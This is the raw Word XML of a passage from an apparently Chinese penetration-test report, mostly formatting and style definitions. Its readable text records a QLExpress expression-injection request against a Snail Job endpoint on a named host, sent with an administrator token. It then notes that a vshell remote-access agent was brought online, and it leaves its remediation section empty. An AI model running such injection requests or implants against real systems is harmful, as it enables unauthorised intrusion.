        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:cs="Times New Roman" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>然后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:cs="Times New Roman" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>QLExpress</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:cs="Times New Roman" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 表达式注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6705A796">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:spacing w:after="160" w:lineRule="auto" w:line="276"/>
        <w:ind w:firstLine="440"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:cs="Times New Roman" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>计算1+1=2</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="style154"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8296"/>
      </w:tblGrid>
      <w:tr w14:paraId="53C04CE3">
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8296" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5EFB0C5E">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:spacing w:lineRule="auto" w:line="240"/>
              <w:ind w:firstLine="440"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="等线" w:cs="Times New Roman" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>POST /snail-job/workflow/check-node-expression HTTP/1.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60165B0C">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:spacing w:lineRule="auto" w:line="240"/>
              <w:ind w:firstLine="440"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="等线" w:cs="Times New Roman" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Host: web.hzdyjsxy.cn:18080</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54AFC096">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:spacing w:lineRule="auto" w:line="240"/>
              <w:ind w:firstLine="440"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="等线" w:cs="Times New Roman" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Content-Type: application/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="等线" w:cs="Times New Roman" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>json</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="757C238A">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:spacing w:lineRule="auto" w:line="240"/>
              <w:ind w:firstLine="440"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="等线" w:cs="Times New Roman" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>snail-job-auth: &lt;管理员 token&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="366C584C">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:spacing w:lineRule="auto" w:line="240"/>
              <w:ind w:firstLine="440"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="等线" w:cs="Times New Roman" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>snail-job-namespace-id: prod</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75843C7D">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:spacing w:lineRule="auto" w:line="240"/>
              <w:ind w:firstLine="640"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6D11824A">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:spacing w:lineRule="auto" w:line="240"/>
              <w:ind w:firstLine="440"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="等线" w:cs="Times New Roman" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>{"expressionType":3,"nodeExpression":"1+1","checkContent":"{}"}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="135291FC">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:spacing w:after="160" w:lineRule="auto" w:line="276"/>
        <w:ind w:firstLine="440"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:cs="Times New Roman" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distL="0" distT="0" distB="0" distR="0">
            <wp:extent cx="5276850" cy="2006600"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="1028"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4" cstate="print"/>
                    <a:srcRect l="0" t="0" r="0" b="0"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm rot="0">
                      <a:off x="0" y="0"/>
                      <a:ext cx="5276850" cy="2006600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B72B24">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:spacing w:after="160" w:lineRule="auto" w:line="276"/>
        <w:ind w:firstLine="440"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:cs="Times New Roman" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>然后上线</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:cs="Times New Roman" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>vshell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AFEDF91">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:spacing w:after="160" w:lineRule="auto" w:line="276"/>
        <w:ind w:firstLine="440"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:cs="Times New Roman" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distL="0" distT="0" distB="0" distR="0">
            <wp:extent cx="5283200" cy="2908300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1029"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图片 1"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId5" cstate="print"/>
                    <a:srcRect l="0" t="0" r="0" b="0"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm rot="0">
                      <a:off x="0" y="0"/>
                      <a:ext cx="5283200" cy="2908300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="32638AAC">
      <w:pPr>
        <w:pStyle w:val="style4097"/>
        <w:spacing w:before="120"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FCBBB82">
      <w:pPr>
        <w:pStyle w:val="style4097"/>
        <w:spacing w:before="120"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35E52798">
      <w:pPr>
        <w:pStyle w:val="style2"/>
        <w:ind w:firstLine="640"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（三）成果说明</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332CC2FE">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:ind w:firstLine="640"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>弱口令和表达式注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57415CC5">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:ind w:firstLine="640"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0190CAE3">
      <w:pPr>
        <w:pStyle w:val="style2"/>
        <w:ind w:firstLine="640"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（四）处置建议</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC4075C">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:ind w:firstLine="640"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D5B244C">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:lineRule="exact" w:line="20"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Times New Roman" w:eastAsia="黑体" w:hAnsi="Calibri"/>
          <w:b/>
          <w:kern w:val="0"/>
          <w:sz w:val="2"/>
          <w:szCs w:val="2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C8C4EB6">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:sectPr>
      <w:headerReference w:type="even" r:id="rId6"/>
      <w:headerReference w:type="default" r:id="rId7"/>
      <w:footerReference w:type="even" r:id="rId8"/>
      <w:footerReference w:type="default" r:id="rId9"/>
      <w:headerReference w:type="first" r:id="rId10"/>
      <w:pgSz w:w="11906" w:h="16838" w:orient="portrait"/>
      <w:pgMar w:top="1644" w:right="1644" w:bottom="1644" w:left="1644" w:header="851" w:footer="1247" w:gutter="0"/>
      <w:cols w:space="425"/>
      <w:docGrid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仿宋_GB2312">
    <w:altName w:val="仿宋"/>
    <w:panose1 w:val="02010609030001010101"/>
    <w:charset w:val="86"/>
    <w:family w:val="modern"/>
    <w:pitch w:val="fixed"/>
    <w:sig w:usb0="00000001" w:usb1="080E0000" w:usb2="00000010" w:usb3="00000000" w:csb0="00040000" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="等线">
    <w:altName w:val="DengXian"/>
    <w:panose1 w:val="02010600030001010101"/>
    <w:charset w:val="86"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="A00002BF" w:usb1="38CF7CFA" w:usb2="00000016" w:usb3="00000000" w:csb0="0004000F" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="黑体">
    <w:altName w:val="SimHei"/>
    <w:panose1 w:val="02010609060001010101"/>
    <w:charset w:val="86"/>
    <w:family w:val="modern"/>
    <w:pitch w:val="fixed"/>
    <w:sig w:usb0="800002BF" w:usb1="38CF7CFA" w:usb2="00000016" w:usb3="00000000" w:csb0="00040001" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="楷体_GB2312">
    <w:altName w:val="楷体"/>
    <w:panose1 w:val="02010609030001010101"/>
    <w:charset w:val="86"/>
    <w:family w:val="modern"/>
    <w:pitch w:val="fixed"/>
    <w:sig w:usb0="00000001" w:usb1="080E0000" w:usb2="00000010" w:usb3="00000000" w:csb0="00040000" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="仿宋">
    <w:altName w:val="仿宋"/>
    <w:panose1 w:val="02010609060001010101"/>
    <w:charset w:val="86"/>
    <w:family w:val="modern"/>
    <w:pitch w:val="fixed"/>
    <w:sig w:usb0="800002BF" w:usb1="38CF7CFA"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 w:name="Helvetica">
    <w:altName w:val="Helvetica"/>
    <w:panose1 w:val="020b0604020002020204"/>
    <w:charset w:val="00"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="E0002EFF" w:usb1="C000785B"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楷体">
    <w:altName w:val="楷体"/>
    <w:panose1 w:val="02010609060001010101"/>
    <w:charset w:val="86"/>
    <w:family w:val="modern"/>
    <w:pitch w:val="fixed"/>
    <w:sig w:usb0="800002BF" w:usb1="38CF7CFA" w:usb2="00000016" w:usb3="00000000" w:csb0="00040001" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Calibri">
    <w:altName w:val="Calibri"/>
    <w:panose1 w:val="020f0502020002030204"/>
    <w:charset w:val="00"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="E4002EFF" w:usb1="C2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F1F8080">
    <w:pPr>
      <w:pStyle w:val="style32"/>
      <w:ind w:firstLine="280"/>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>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98133D5">
    <w:pPr>
      <w:pStyle w:val="style32"/>
      <w:ind w:firstLine="280"/>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>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727DF1B">
    <w:pPr>
      <w:pStyle w:val="style31"/>
      <w:ind w:firstLine="36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E359CA2">
    <w:pPr>
      <w:pStyle w:val="style31"/>
      <w:ind w:firstLine="360"/>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749DF86">
    <w:pPr>
      <w:pStyle w:val="style31"/>
      <w:ind w:firstLine="3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5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evenAndOddHeaders/>
  <w:drawingGridHorizontalSpacing w:val="158"/>
  <w:drawingGridVerticalSpacing w:val="579"/>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4097"/>
    <w:qFormat/>
    <w:pPr>
      <w:widowControl w:val="false"/>
      <w:adjustRightInd w:val="false"/>
      <w:snapToGrid w:val="false"/>
      <w:spacing w:lineRule="exact" w:line="580"/>
      <w:ind w:firstLine="200" w:firstLineChars="200"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="宋体" w:eastAsia="仿宋_GB2312"/>
      <w:kern w:val="2"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="style1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="style0"/>
    <w:next w:val="style0"/>
    <w:link w:val="style4100"/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="等线" w:eastAsia="黑体" w:hAnsi="等线"/>
      <w:bCs/>
      <w:kern w:val="44"/>
      <w:szCs w:val="44"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="style2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="style0"/>
    <w:next w:val="style0"/>
    <w:link w:val="style4101"/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="宋体" w:eastAsia="楷体_GB2312"/>
      <w:bCs/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="style3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="style0"/>
    <w:next w:val="style0"/>
    <w:link w:val="style4102"/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="style4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="style0"/>
    <w:next w:val="style0"/>
    <w:link w:val="style4104"/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="宋体" w:eastAsia="仿宋"/>
      <w:bCs/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="style5">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="style0"/>
    <w:next w:val="style0"/>
    <w:link w:val="style4105"/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="80" w:after="40"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="等线" w:cs="宋体" w:eastAsia="等线" w:hAnsi="等线"/>
      <w:color w:val="0f4761"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="style6">
    <w:name w:val="heading 6"/>
    <w:basedOn w:val="style0"/>
    <w:next w:val="style0"/>
    <w:link w:val="style4106"/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="40"/>
      <w:outlineLvl w:val="5"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="等线" w:cs="宋体" w:eastAsia="等线" w:hAnsi="等线"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="0f4761"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="style7">
    <w:name w:val="heading 7"/>
    <w:basedOn w:val="style0"/>
    <w:next w:val="style0"/>
    <w:link w:val="style4107"/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="40"/>
      <w:outlineLvl w:val="6"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="等线" w:cs="宋体" w:eastAsia="等线" w:hAnsi="等线"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="595959"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="style8">
    <w:name w:val="heading 8"/>
    <w:basedOn w:val="style0"/>
    <w:next w:val="style0"/>
    <w:link w:val="style4108"/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:outlineLvl w:val="7"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="等线" w:cs="宋体" w:eastAsia="等线" w:hAnsi="等线"/>
      <w:color w:val="595959"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="style9">
    <w:name w:val="heading 9"/>
    <w:basedOn w:val="style0"/>
    <w:next w:val="style0"/>
    <w:link w:val="style4109"/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:outlineLvl w:val="8"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="等线" w:cs="宋体" w:eastAsia="等线 Light" w:hAnsi="等线"/>
      <w:color w:val="59595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章正文"/>
    <w:basedOn w:val="style0"/>
    <w:next w:val="style4097"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:beforeLines="50" w:lineRule="auto" w:line="300"/>
      <w:ind w:firstLine="480"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="style32">
    <w:name w:val="footer"/>
    <w:basedOn w:val="style0"/>
    <w:next w:val="style32"/>
    <w:link w:val="style4099"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:leader="none" w:pos="4153"/>
        <w:tab w:val="right" w:leader="none" w:pos="8306"/>
      </w:tabs>
      <w:spacing w:lineRule="auto" w:line="240"/>
      <w:ind w:firstLine="100" w:firstLineChars="100"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="style31">
    <w:name w:val="header"/>
    <w:basedOn w:val="style0"/>
    <w:next w:val="style31"/>
    <w:link w:val="style4098"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:leader="none" w:pos="4153"/>
        <w:tab w:val="right" w:leader="none" w:pos="8306"/>
      </w:tabs>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="style19">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="style0"/>
    <w:next w:val="style0"/>
    <w:qFormat/>
    <w:uiPriority w:val="39"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="8834"/>
      </w:tabs>
      <w:ind w:firstLine="0" w:firstLineChars="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman" w:eastAsia="黑体"/>
      <w:szCs w:val="30"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="style74">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="style0"/>
    <w:next w:val="style0"/>
    <w:link w:val="style4110"/>
    <w:qFormat/>
    <w:uiPriority w:val="11"/>
    <w:pPr>
      <w:spacing w:after="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="等线 Light" w:cs="宋体" w:eastAsia="等线 Light" w:hAnsi="等线 Light"/>
      <w:color w:val="595959"/>
      <w:spacing w:val="15"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="style20">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="style0"/>
    <w:next w:val="style0"/>
    <w:qFormat/>
    <w:uiPriority w:val="39"/>
    <w:pPr>
      <w:ind w:left="200" w:leftChars="200" w:firstLine="0" w:firstLineChars="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="楷体_GB2312"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="style94">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="style0"/>
    <w:next w:val="style94"/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:beforeAutospacing="true" w:afterAutospacing="true"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="style62">
    <w:name w:val="Title"/>
    <w:basedOn w:val="style0"/>
    <w:next w:val="style0"/>
    <w:link w:val="style4103"/>
    <w:qFormat/>
    <w:uiPriority w:val="10"/>
    <w:pPr>
      <w:ind w:firstLine="0" w:firstLineChars="0"/>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="宋体" w:eastAsia="方正小标宋简体"/>
      <w:bCs/>
      <w:sz w:val="44"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="style154">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="style105"/>
    <w:next w:val="style154"/>
    <w:qFormat/>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41">
    <w:name w:val="page number"/>
    <w:basedOn w:val="style65"/>
    <w:next w:val="style41"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
      <w:sz w:val="28"/>
      <w:u w:val="none"/>
      <w:vertAlign w:val="baseline"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="style85">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="style65"/>
    <w:next w:val="style85"/>
    <w:qFormat/>
    <w:rPr>
      <w:color w:val="467886"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="style4098">
    <w:name w:val="页眉 字符"/>
    <w:basedOn w:val="style65"/>
    <w:next w:val="style4098"/>
    <w:link w:val="style31"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="仿宋_GB2312" w:hAnsi="Times New Roman"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="style4099">
    <w:name w:val="页脚 字符"/>
    <w:basedOn w:val="style65"/>
    <w:next w:val="style4099"/>
    <w:link w:val="style32"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="style4100">
    <w:name w:val="标题 1 字符"/>
    <w:basedOn w:val="style65"/>
    <w:next w:val="style4100"/>
    <w:link w:val="style1"/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:eastAsia="黑体"/>
      <w:bCs/>
      <w:kern w:val="44"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="44"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="style4101">
    <w:name w:val="标题 2 字符"/>
    <w:basedOn w:val="style65"/>
    <w:next w:val="style4101"/>
    <w:link w:val="style2"/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:cs="宋体" w:eastAsia="楷体_GB2312" w:hAnsi="Times New Roman"/>
      <w:bCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="style4102">
    <w:name w:val="标题 3 字符"/>
    <w:basedOn w:val="style65"/>
    <w:next w:val="style4102"/>
    <w:link w:val="style3"/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="仿宋_GB2312" w:hAnsi="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="style157">
    <w:name w:val="No Spacing"/>
    <w:next w:val="style157"/>
    <w:qFormat/>
    <w:uiPriority w:val="1"/>
    <w:pPr>
      <w:widowControl w:val="false"/>
      <w:adjustRightInd w:val="false"/>
      <w:snapToGrid w:val="false"/>
      <w:ind w:firstLine="200" w:firstLineChars="200"/>
      <w:jc w:val="both"/>
